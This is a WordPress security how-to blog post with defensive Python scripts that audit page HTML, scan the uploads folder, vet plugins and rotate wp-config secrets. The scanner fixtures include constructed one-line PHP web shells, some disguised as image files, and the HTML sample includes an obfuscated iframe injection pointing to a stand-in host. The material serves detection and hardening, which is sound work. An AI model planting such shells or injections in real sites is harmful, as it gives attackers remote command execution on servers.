How To: Keep Your WordPress Site Secure

With more than 70 million sites around the world running WordPress, it has become a frequent target for hackers.  Security against such hacks is critical to avoid unnecessary downtime or the embarrassing warning messages people see when they search for your site on Google.

If you’re an admin, you won’t always know whether your site has been hacked until someone points it out to you after seeing such a warning in their search results.  It’s useful to keep an eye on your site(s) and periodically log in to your WordPress Dashboard so you can update your plugins and WordPress installation.  You should do this often whether or not you have time to write that blog post you keep telling yourself you’ll write.  If you start to feel paranoid about this process, you’re probably doing something right!

One of the most obvious signs of a hacked web site is a change in load time.  If your site “feels slow,” it could be loading malicious scripts in addition to your normal pages. If you suspect this is the case:

  • Use an HTTP debugger like Fiddler to see what data is being loaded and where it’s being loaded from.  If you see HTTP requests going to domain names other than your own, start asking more questions.  Of course scripts like Google Analytics and TypeKit are okay, but question everything. Hackers are sneaky!
  • View the HTML source of your site to see if any unusual scripts or iframes are being injected.
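The two checks above can be scripted. The following is an added example for this article, not code from the original post: it parses one saved HTML page with the standard library only, lists every script, iframe, image and stylesheet that is fetched from a host outside an allowlist, and flags inline scripts that use the packing tricks injected code tends to rely on. The sample page, the site name example.com and the allowlist entries are constructed for illustration; on a real site you would save the page with your browser or Fiddler and feed that file in.

```python
"""Triage a page's HTML for third-party and suspicious scripts.

Added example for this article, not code from the original post.
Standard library only, so it runs offline against a saved page.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts the owner expects resources to come from. Assumption: the site
# is example.com and legitimately uses Google Analytics and Typekit.
ALLOWED_HOSTS = {"example.com", "www.example.com",
                 "www.google-analytics.com", "use.typekit.net"}

# Constructs that appear in some legitimate scripts but far more often in
# injected ones: runtime decoding/evaluation of a hidden payload, or a
# very long base64 blob.
SUSPICIOUS_INLINE = re.compile(
    r"eval\(|unescape\(|String\.fromCharCode|atob\(|[A-Za-z0-9+/]{200,}={0,2}")


class ResourceCollector(HTMLParser):
    """Collects external resource URLs and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []      # (tag, url)
        self.inline = []        # inline <script> bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ("script", "iframe", "img", "link"):
            url = attrs.get("src") or attrs.get("href")
            if url:
                self.external.append((tag, url))
        if tag == "script" and not attrs.get("src"):
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def audit_html(html, allowed_hosts=ALLOWED_HOSTS):
    """Return [(kind, tag, detail)]: 'external' for resources fetched from
    a host not on the allowlist, 'inline' for scripts matching the
    obfuscation patterns. Relative URLs are the site's own and are skipped."""
    parser = ResourceCollector()
    parser.feed(html)
    findings = []
    for tag, url in parser.external:
        host = urlsplit(url).hostname
        if host and host.lower() not in allowed_hosts:
            findings.append(("external", tag, url))
    for body in parser.inline:
        if SUSPICIOUS_INLINE.search(body):
            findings.append(("inline", "script", body.strip()[:80]))
    return findings


# Constructed sample page: two expected third-party scripts, one unknown
# stats script, one document.write(unescape(...)) injection and a 1x1 iframe.
SAMPLE_PAGE = """<html><head>
<link rel="stylesheet" href="/wp-content/themes/twentytwelve/style.css">
<script src="https://www.google-analytics.com/ga.js"></script>
<script src="//use.typekit.net/abc123.js"></script>
</head><body>
<h1>Welcome</h1>
<script src="http://stats-counter.example.net/c.php?id=9"></script>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fbad.example%22%3E'));</script>
<iframe src="http://bad.example/x.html" width="1" height="1"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, tag, detail in audit_html(SAMPLE_PAGE):
        print(f"{kind:8} {tag:7} {detail}")
```

Anything reported as `external` is a question to answer, not automatically malicious; the point is that the allowlist makes you write down what the page is supposed to load, so the thing you did not add stands out.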

Tip #1: In WordPress, two of the most common places for injected code to land are the MySQL database and the /wp-content/uploads/ folder.  Even a site that is otherwise locked down still has to let WordPress write to both: the database stores and retrieves your posts and settings, and /wp-content/uploads/ stores your uploaded images, PDFs, etc.  Check both when you suspect a hack.

Why Me?

Oftentimes it’s not a specific person who has selected your computer or hosting account as a target.  Usually it’s a highly automated process, and it is very much a numbers game: hackers have to gain access to large numbers of accounts for their overall scheme to pay off.  One hack that we saw turned the underlying hosting account into a host for a fake Royal Bank of Canada login page.  This page was used in combination with a spam and phishing campaign to trick people into signing into their RBC account (and therefore giving up their login credentials).  Identity theft is big business for criminals, and in today’s digital world it all comes together in ways you’d never expect.

Tip #2: This goes without saying for some of us, but the tactic still works because some people still do it: never click on links or attachments in an e-mail from people you don’t know and never use pirated software.  If you do, you could unknowingly contribute to the success of a malicious hacker!

Hosting Matters

Hosting is very much a “you get what you pay for” service.  Many companies promise “unlimited” resources for under $10/month.  The way they are able to provide this rate is by cutting some corners.  You don’t want your hosting company to cut corners if it could mean downtime and paying someone to fix a hacked site.  Make sure you ask questions about their server, operating system, and security patching schedule.  The best hosting companies will apply the latest security patches at least once per month.

There are a variety of helpful resources on the web that will guide you through a secure setup of your WordPress installation by locking down your .htaccess file and /wp-content/uploads/ directory (in particular, by denying execution of any PHP file that ends up in uploads).

A good place to start is the official Codex documentation on “Hardening WordPress”.
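Tip #1 above says to check /wp-content/uploads/, and the Codex page says to lock it down; the following is an added example for this article (not code from the post or from the Codex) that does both checks. It walks an uploads tree looking for anything that could run as PHP: files with a PHP extension, double extensions such as logo.php.png, and files named like images that contain a PHP open tag. It then checks that the directory's .htaccess carries the Codex-style “kill PHP execution” rule. To run offline it builds a throwaway uploads directory with constructed files; on a live site you would point the two check functions at the real /wp-content/uploads/ path.

```python
"""Scan a WordPress uploads tree for files that could execute as PHP,
and check that its .htaccess blocks PHP execution.

Added example for this article; not code from the post or the Codex.
The fixture built by build_sample_uploads() is constructed.
"""
import os
import re
import tempfile

# Extensions Apache may hand to the PHP interpreter; none belong in uploads.
PHP_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
PHP_EXT_NAMES = {e.lstrip(".") for e in PHP_EXTENSIONS}

# A PHP open tag inside a file named like an image or document
# (e.g. banner.gif that is really a backdoor).
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)")


def find_executable_uploads(root):
    """Return sorted [(relative_path, reason)] for suspicious files under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            ext = os.path.splitext(name)[1].lower()
            if ext in PHP_EXTENSIONS:
                hits.append((rel, "php extension"))
                continue
            # Double extensions like logo.php.png: with Apache's AddHandler
            # style configuration every extension is considered, so it runs.
            middle = [p.lower() for p in name.split(".")[1:-1]]
            if any(p in PHP_EXT_NAMES for p in middle):
                hits.append((rel, "php in double extension"))
                continue
            with open(path, "rb") as fh:
                head = fh.read(4096)
            if PHP_OPEN_TAG.search(head):
                hits.append((rel, "php open tag in non-php file"))
    return sorted(hits)


def uploads_blocks_php(root):
    """True if root/.htaccess denies access to *.php inside a <Files> or
    <FilesMatch> block, in Apache 2.2 ("deny from all") or Apache 2.4
    ("Require all denied") syntax."""
    path = os.path.join(root, ".htaccess")
    if not os.path.isfile(path):
        return False
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    block = re.search(r"<Files(?:Match)?[^>]*php[^>]*>(.*?)</Files(?:Match)?>",
                      text, re.S | re.I)
    if not block:
        return False
    return re.search(r"deny\s+from\s+all|Require\s+all\s+denied",
                     block.group(1), re.I) is not None


def build_sample_uploads(with_htaccess=True):
    """Create a constructed uploads tree in a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="wp-uploads-")

    def put(rel, data):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)

    put("2012/07/photo.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF constructed image bytes")
    put("2012/07/brochure.pdf", b"%PDF-1.4 constructed document bytes")
    # Three constructed examples of what a compromise leaves behind:
    put("2012/08/wp-cache.php", b"<?php eval(base64_decode($_POST['c'])); ?>")
    put("2012/08/logo.php.png", b"<?php system($_GET['cmd']); ?>")
    put("2012/08/banner.gif", b"GIF89a<?php system($_GET['cmd']); ?>")
    if with_htaccess:
        # The "kill PHP execution" rule the Codex recommends for
        # wp-content/uploads (Apache 2.2 syntax).
        put(".htaccess", b"<Files *.php>\ndeny from all\n</Files>\n")
    return root


if __name__ == "__main__":
    sample = build_sample_uploads()
    for rel, reason in find_executable_uploads(sample):
        print(f"{reason:30} {rel}")
    print("uploads .htaccess blocks PHP:", uploads_blocks_php(sample))
```

The .htaccess check only tells you the rule is present; it cannot tell you whether the host actually honours .htaccess (AllowOverride) or runs PHP through a handler that ignores it, so confirm by requesting a harmless test .php file in uploads and checking that you get a 403 rather than executed output.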

Strong Usernames and Passwords

Choose your username and password wisely. Your WP install may come with a default “admin” username (depending on who initially set up the WP installation).  Log in, immediately create a new administrator account with a custom username, then log in as that user and delete the old “admin” account (WordPress will offer to attribute its posts to another user).  Use a solid Password Generator that will force you to create Strong Passwords.

Be careful how you transmit your new account credentials. Avoid sharing usernames and passwords by email, and especially avoid repeating them across a thread of replies.  You should also take care storing your login credentials. It’s a good idea not to keep the initial username/password email that WP sends.  This prevents access to your WP account should your email account ever get hacked.

Use Reputable Plugins

Plugins can be fun and incredibly useful. With more than 19,000 free plugins available from the WP Plugin Directory, you can pretty much find a plugin for anything you can think of. You should, however, use caution and install only the minimum number of plugins necessary for your site.  There’s usually not a good reason to keep plugins activated if you aren’t using them, and a deactivated plugin’s files still sit on the server where a flaw in them can be reached.  If you’re not using a particular plugin, do yourself a favor:   DELETE IT.  This will help reduce the “surface area” of potential vulnerabilities in your site.

If you really want to lock it down or have had a previous bad experience, then you should only use plugins that have been recently updated to support the latest version of WordPress.  Plugins that have not been updated in 467 days or more should never be used.  That usually means the plugin developer gave up on maintaining the plugin, and hackers can use this against you!  Also, look for plugins that have at least a 3/5 star rating, have been downloaded thousands of times, are not at an early beta version number, and were developed by a reputable developer/company.  All of those things usually indicate a worthy plugin that other WordPress users have vetted.
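Part of that vetting can be done against the plugin files you already have installed. Every plugin in the directory ships a readme.txt whose header block carries “Requires at least”, “Tested up to” and “Stable tag”; the following added example (not code from the post or from WordPress.org) reads those headers and flags plugins that have not been tested against a recent WordPress release or that are still at a pre-release version. The two readmes are constructed. Download counts, star ratings and the last-updated date appear on the directory listing rather than in readme.txt, so those parts of the checklist stay manual.

```python
"""Vet installed plugins by their readme.txt headers.

Added example for this article, not code from the post or WordPress.org.
The sample readmes below are constructed.
"""
import re

HEADER_RE = re.compile(
    r"^(Requires at least|Tested up to|Stable tag):[ \t]*(.+?)[ \t]*$", re.M | re.I)


def parse_readme_headers(text):
    """Return {'tested up to': '3.4.1', ...} for the recognised headers."""
    return {k.lower(): v for k, v in HEADER_RE.findall(text)}


def version_tuple(v):
    """'3.4.1' -> (3, 4, 1); '3.4' -> (3, 4, 0); '1.0-beta2' -> (1, 0, 0).
    Only the numeric dotted part before any '-' suffix is considered."""
    nums = [int(n) for n in re.findall(r"\d+", v.split("-")[0])]
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums[:3])


def vet_plugin(readme_text, current_wp):
    """Return a list of warnings; an empty list means the readme passes."""
    headers = parse_readme_headers(readme_text)
    warnings = []

    tested = headers.get("tested up to")
    if not tested:
        warnings.append("no 'Tested up to' header")
    else:
        t, c = version_tuple(tested), version_tuple(current_wp)
        # More than one minor release behind (tested on 3.2, running 3.4),
        # or any major version behind, means the author has not touched it
        # across a whole WordPress release cycle.
        if c[0] > t[0] or (c[0] == t[0] and c[1] - t[1] > 1):
            warnings.append(f"tested up to WordPress {tested}, running {current_wp}")

    stable = headers.get("stable tag", "")
    if not stable or stable.lower() == "trunk":
        warnings.append("no stable release tag (trunk only)")
    elif re.search(r"alpha|beta|rc\d*$|dev", stable, re.I) or version_tuple(stable)[0] == 0:
        warnings.append(f"pre-release version {stable}")
    return warnings


def vet_all(readmes, current_wp):
    """{plugin_name: [warnings]} for a dict of plugin name -> readme text."""
    return {name: vet_plugin(text, current_wp) for name, text in readmes.items()}


# Constructed readme.txt header blocks: one maintained plugin, one stale one.
GOOD_README = """=== Example Cache ===
Contributors: someone
Tags: cache, performance
Requires at least: 3.0
Tested up to: 3.4.1
Stable tag: 2.1.3
"""

STALE_README = """=== Old Widget ===
Contributors: nobody
Requires at least: 2.8
Tested up to: 3.1
Stable tag: 0.4-beta
"""

if __name__ == "__main__":
    report = vet_all({"example-cache": GOOD_README, "old-widget": STALE_README}, "3.4.1")
    for name, warnings in report.items():
        print(name, "OK" if not warnings else "; ".join(warnings))
```

On a real install, read `wp-content/plugins/<slug>/readme.txt` for each directory and pass the running version from the Dashboard; a plugin that passes this check still deserves the rating and download-count look before you trust it.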

WordPress Patches

It may be YOUR responsibility, and not your webmaster’s, to update your WordPress site with the latest patches from WordPress.  It’s a good idea to check in with your webmaster when you are doing major WordPress upgrades (ex: going from version 3.2.1 to 3.4.1), since those can break themes and plugins.  WordPress is constantly being updated, so it’s not surprising to get multiple updates in a month.  Stay on top of them!

Options for Fixing a Hacked WordPress Site

If you know your site has been hacked, try restoring your site from a backup.  (This is in addition to making sure your host does backups in the first place!)  The backup you restore must predate the compromise, which often means going back a couple of weeks or more: hackers will sometimes get their malicious code into your site long before it becomes active, so a recent backup may already contain it.  You may lose valuable posts and other data, though this might be a reasonable compromise to make.

Sometimes, unfortunately, fixing a hacked site is not as simple as going back to a previous version that you have zipped up and sitting on your hard drive or in your Dropbox account.  Sometimes you will need to hire an expert to make the right choices.  It may take a few hours of their time, but they are very likely to be able to recover recent posts, e-commerce orders and important files (because they know what they’re doing).

Once you are all cleaned up and ready to go again, make sure you change ALL of your usernames and passwords (using your strong password generator).  Work with your webmaster or host to change the database username and password stored in wp-config.php, and to change them on the MySQL side to match; otherwise anyone who read the old wp-config.php still has a working database login.
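The “strong password generator” from the Strong Usernames and Passwords section and the wp-config.php change described here fit in one script. The following is an added example for this article, not code from the post or from WordPress: it generates passwords with Python’s `secrets` module, reports their entropy, and rewrites the `DB_PASSWORD` define in a wp-config.php given as text. It also regenerates the eight authentication keys and salts that wp-config.php defines, because new salts invalidate every existing login cookie, including any session the attacker still holds. The sample config is constructed. Rewriting the file does not change the MySQL account itself; that password has to be set on the database side (ALTER USER or SET PASSWORD) to the same value, which is outside what this script can do.

```python
"""Generate strong credentials and rotate the secrets in wp-config.php.

Added example for this article, not code from the post or WordPress.
SAMPLE_CONFIG is a constructed wp-config.php fragment.
"""
import math
import re
import secrets
import string

# Letters, digits and punctuation, deliberately leaving out ' " and \ so a
# generated value can be pasted into a single-quoted PHP string unescaped.
ALPHABET = string.ascii_letters + string.digits + "!#$%&()*+,-./:;<=>?@[]^_{|}~"

# The keys/salts WordPress defines in wp-config.php; regenerating them
# logs every user out, attacker included.
WP_SALT_NAMES = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
                 "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")


def generate_password(length=24, alphabet=ALPHABET):
    """Cryptographically random password drawn uniformly from alphabet."""
    return "".join(secrets.choice(alphabet) for _ in range(length))


def password_entropy_bits(length, alphabet=ALPHABET):
    """Entropy of a uniformly random password: length * log2(|alphabet|)."""
    return length * math.log2(len(alphabet))


def _replace_define(text, name, value):
    """Replace the value of define('NAME', '...') in PHP source; returns
    (new_text, replaced). Assumes the value has no escaped quotes inside."""
    pattern = re.compile(
        r"define\(\s*(['\"])%s\1\s*,\s*(['\"])(.*?)\2\s*\)" % re.escape(name))
    m = pattern.search(text)
    if not m:
        return text, False
    start, end = m.span(3)
    return text[:start] + value + text[end:], True


def rotate_wp_config(config_text, new_db_password=None, new_salts=None):
    """Return (new_config_text, {define_name: new_value}) with DB_PASSWORD
    and all eight keys/salts replaced. Values are generated when not given."""
    new_db_password = new_db_password or generate_password()
    new_salts = new_salts or {n: generate_password(64) for n in WP_SALT_NAMES}
    changes = {}
    config_text, ok = _replace_define(config_text, "DB_PASSWORD", new_db_password)
    if ok:
        changes["DB_PASSWORD"] = new_db_password
    for name in WP_SALT_NAMES:
        config_text, ok = _replace_define(config_text, name, new_salts[name])
        if ok:
            changes[name] = new_salts[name]
    return config_text, changes


SAMPLE_CONFIG = """<?php
define('DB_NAME', 'wp_site');
define('DB_USER', 'wp_site');
define('DB_PASSWORD', 'summer2012');
define('DB_HOST', 'localhost');
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
define('AUTH_SALT',        'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT',   'put your unique phrase here');
define('NONCE_SALT',       'put your unique phrase here');
$table_prefix = 'wp_';
"""

if __name__ == "__main__":
    print(f"24-char password from {len(ALPHABET)} symbols: "
          f"{password_entropy_bits(24):.0f} bits")
    new_text, changes = rotate_wp_config(SAMPLE_CONFIG)
    print("rotated:", ", ".join(changes))
    print(new_text)
```

Run it against a copy of the real file, diff the result before putting it in place, and then set the same DB_PASSWORD on the MySQL account; until both sides match, the site cannot reach its database.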